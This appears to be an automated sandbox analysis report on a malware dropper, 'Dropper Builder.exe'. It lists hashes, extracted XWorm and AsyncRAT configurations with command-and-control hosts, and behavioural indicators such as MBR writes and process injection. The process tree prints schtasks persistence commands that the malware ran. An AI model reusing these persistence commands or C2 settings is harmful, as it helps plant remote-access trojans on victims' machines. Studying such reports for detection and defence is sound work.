Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 05:51
Static task
static1
Behavioral task
behavioral1
Sample
Dropper Builder.exe
Resource
win7-20240220-en
General
-
Target
Dropper Builder.exe
-
Size
18.6MB
-
MD5
c660fd4addbfaa81fac0a1f5d39cd000
-
SHA1
7d1aaa224037b1ade30bb951ee04989b73d71a81
-
SHA256
7e19aad8690328d389e5d037dd47c4fdcea7775ad69a0755c3e2eeba1df44ed8
-
SHA512
a53d1608adb02d2b7ad7109490e1dce4b073cf622a291b52cea8794ba3c0296248fa87fb8305893cfb65d44f500afc7057375368eff2fd0a2e872a6420e8d5c9
-
SSDEEP
98304:c+R1sVuWzOYBvDdXCxGSQjJQaoyqUIIdZicEMtECV:ckCzFvDdXCcSQLbqUISpEMW
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral2/memory/3984-113-0x0000000000340000-0x0000000000352000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2840 created 612 2840 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$77-aachost.exe$77-sdchost.exeDropper Builder.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation $77-aachost.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation $77-sdchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation Dropper Builder.exe -
Executes dropped EXE 9 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exe$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-scchost.exe$77-scchost.exepid process 3984 $77-sdchost.exe 4576 $77-aachost.exe 4280 $77-penisballs.exe 4940 $77-install.exe 4652 $77-sdchost.exe 3836 $77-aachost.exe 1048 $77-penisballs.exe 4364 $77-scchost.exe 400 $77-scchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
$77-sdchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" $77-sdchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\P: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
wmiprvse.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 10 IoCs
Processes:
$77-penisballs.exesvchost.exesvchost.exe$77-aachost.exepowershell.EXE$77-sdchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisballs.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77-scchost svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe $77-aachost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log $77-aachost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe $77-sdchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2840 set thread context of 436 2840 powershell.EXE dllhost.exe -
Drops file in Windows directory 7 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\EventCache.v2\{4E3A2C56-F6CF-44DC-94A9-BA869AC1A54A}.bin svchost.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 2540 timeout.exe 4968 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEWaaSMedicAgent.exeOfficeClickToRun.exedllhost.exe$77-sdchost.execmd.exe$77-aachost.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" $77-sdchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000e964355368c4da01 cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000624f415068c4da01 dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000fdd84a5068c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000693b4d5068c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-aachost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fdd84a5068c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000624f415068c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a801335068c4da01 dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ndfapi.dll,-40001 = "Windows Network Diagnostics" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2BF9676-5F8F-435C-97EB-11607A5BEDF7} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fdd84a5068c4da01 dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" $77-sdchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fdd84a5068c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer dllhost.exe -
Modifies registry class 1 IoCs
Processes:
Dropper Builder.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Dropper Builder.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2200 schtasks.exe 4988 schtasks.exe 2972 schtasks.exe 4584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXE$77-aachost.exedllhost.exe$77-penisballs.exe$77-aachost.exepid process 2840 powershell.EXE 2840 powershell.EXE 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 2840 powershell.EXE 436 dllhost.exe 436 dllhost.exe 4576 $77-aachost.exe 4576 $77-aachost.exe 4280 $77-penisballs.exe 4280 $77-penisballs.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 436 dllhost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe 3836 $77-aachost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exepowershell.EXE$77-aachost.exedllhost.exe$77-sdchost.exesvchost.exe$77-penisballs.exe$77-aachost.exeExplorer.EXEWMIC.exesvchost.exedescription pid process Token: SeDebugPrivilege 3984 $77-sdchost.exe Token: SeDebugPrivilege 4280 $77-penisballs.exe Token: SeDebugPrivilege 2840 powershell.EXE Token: SeDebugPrivilege 4576 $77-aachost.exe Token: SeDebugPrivilege 2840 powershell.EXE Token: SeDebugPrivilege 436 dllhost.exe Token: SeDebugPrivilege 4652 $77-sdchost.exe Token: SeAuditPrivilege 2816 svchost.exe Token: SeAuditPrivilege 2816 svchost.exe Token: SeAuditPrivilege 2816 svchost.exe Token: SeAuditPrivilege 2816 svchost.exe Token: SeDebugPrivilege 1048 $77-penisballs.exe Token: SeDebugPrivilege 3836 $77-aachost.exe Token: SeShutdownPrivilege 3572 Explorer.EXE Token: SeCreatePagefilePrivilege 3572 Explorer.EXE Token: SeDebugPrivilege 3984 $77-sdchost.exe Token: SeDebugPrivilege 4652 $77-sdchost.exe Token: SeIncreaseQuotaPrivilege 408 WMIC.exe Token: SeSecurityPrivilege 408 WMIC.exe Token: SeTakeOwnershipPrivilege 408 WMIC.exe Token: SeLoadDriverPrivilege 408 WMIC.exe Token: SeSystemProfilePrivilege 408 WMIC.exe Token: SeSystemtimePrivilege 408 WMIC.exe Token: SeProfSingleProcessPrivilege 408 WMIC.exe Token: SeIncBasePriorityPrivilege 408 WMIC.exe Token: SeCreatePagefilePrivilege 408 WMIC.exe Token: SeBackupPrivilege 408 WMIC.exe Token: SeRestorePrivilege 408 WMIC.exe Token: SeShutdownPrivilege 408 WMIC.exe Token: SeDebugPrivilege 408 WMIC.exe Token: SeSystemEnvironmentPrivilege 408 WMIC.exe Token: SeRemoteShutdownPrivilege 408 WMIC.exe Token: SeUndockPrivilege 408 WMIC.exe Token: SeManageVolumePrivilege 408 WMIC.exe Token: 33 408 WMIC.exe Token: 34 408 WMIC.exe Token: 35 408 WMIC.exe Token: 36 408 WMIC.exe Token: SeIncreaseQuotaPrivilege 408 WMIC.exe Token: SeSecurityPrivilege 408 WMIC.exe Token: SeTakeOwnershipPrivilege 408 WMIC.exe Token: SeLoadDriverPrivilege 408 WMIC.exe Token: SeSystemProfilePrivilege 408 WMIC.exe Token: SeSystemtimePrivilege 408 WMIC.exe Token: SeProfSingleProcessPrivilege 408 WMIC.exe Token: SeIncBasePriorityPrivilege 408 WMIC.exe Token: SeCreatePagefilePrivilege 408 WMIC.exe Token: SeBackupPrivilege 408 WMIC.exe Token: SeRestorePrivilege 408 WMIC.exe Token: SeShutdownPrivilege 408 WMIC.exe Token: SeDebugPrivilege 408 WMIC.exe Token: SeSystemEnvironmentPrivilege 408 WMIC.exe Token: SeRemoteShutdownPrivilege 408 WMIC.exe Token: SeUndockPrivilege 408 WMIC.exe Token: SeManageVolumePrivilege 408 WMIC.exe Token: 33 408 WMIC.exe Token: 34 408 WMIC.exe Token: 35 408 WMIC.exe Token: 36 408 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Explorer.EXEpid process 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Explorer.EXEpid process 3572 Explorer.EXE 3572 Explorer.EXE 3572 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$77-penisballs.exe$77-penisballs.exepid process 4280 $77-penisballs.exe 1048 $77-penisballs.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
RuntimeBroker.exepid process 676 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dropper Builder.execmd.exepowershell.EXE$77-aachost.execmd.execmd.exedllhost.exedescription pid process target process PID 2932 wrote to memory of 3224 2932 Dropper Builder.exe cmd.exe PID 2932 wrote to memory of 3224 2932 Dropper Builder.exe cmd.exe PID 2932 wrote to memory of 3224 2932 Dropper Builder.exe cmd.exe PID 3224 wrote to memory of 1204 3224 cmd.exe curl.exe PID 3224 wrote to memory of 1204 3224 cmd.exe curl.exe PID 3224 wrote to memory of 1204 3224 cmd.exe curl.exe PID 2932 wrote to memory of 3984 2932 Dropper Builder.exe $77-sdchost.exe PID 2932 wrote to memory of 3984 2932 Dropper Builder.exe $77-sdchost.exe PID 2932 wrote to memory of 4576 2932 Dropper Builder.exe $77-aachost.exe PID 2932 wrote to memory of 4576 2932 Dropper Builder.exe $77-aachost.exe PID 2932 wrote to memory of 4280 2932 Dropper Builder.exe $77-penisballs.exe PID 2932 wrote to memory of 4280 2932 Dropper Builder.exe $77-penisballs.exe PID 2932 wrote to memory of 4940 2932 Dropper Builder.exe $77-install.exe PID 2932 wrote to memory of 4940 2932 Dropper Builder.exe $77-install.exe PID 2932 wrote to memory of 4940 2932 Dropper Builder.exe $77-install.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 2840 wrote to memory of 436 2840 powershell.EXE dllhost.exe PID 4576 wrote to memory of 1980 4576 $77-aachost.exe cmd.exe PID 4576 wrote to memory of 1980 4576 $77-aachost.exe cmd.exe PID 4576 wrote to memory of 664 4576 $77-aachost.exe cmd.exe PID 4576 wrote to memory of 664 4576 $77-aachost.exe cmd.exe PID 1980 wrote to memory of 2972 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 2972 1980 cmd.exe schtasks.exe PID 664 wrote to memory of 2540 664 cmd.exe timeout.exe PID 664 wrote to memory of 2540 664 cmd.exe timeout.exe PID 436 wrote to memory of 612 436 dllhost.exe winlogon.exe PID 436 wrote to memory of 668 436 dllhost.exe lsass.exe PID 436 wrote to memory of 952 436 dllhost.exe svchost.exe PID 436 wrote to memory of 380 436 dllhost.exe dwm.exe PID 436 wrote to memory of 732 436 dllhost.exe svchost.exe PID 436 wrote to memory of 996 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1080 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1092 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1100 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1184 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1248 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1276 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1316 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1428 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1440 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1448 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1524 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1616 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1680 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1724 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1760 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1808 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1936 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1944 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2008 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2024 436 dllhost.exe svchost.exe PID 436 wrote to memory of 1756 436 dllhost.exe spoolsv.exe PID 436 wrote to memory of 2172 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2240 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2308 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2484 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2492 436 dllhost.exe svchost.exe PID 436 wrote to memory of 2608 436 dllhost.exe sihost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1560c5bc-66e8-4bee-b24c-ba981a93522f}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit4⤵
-
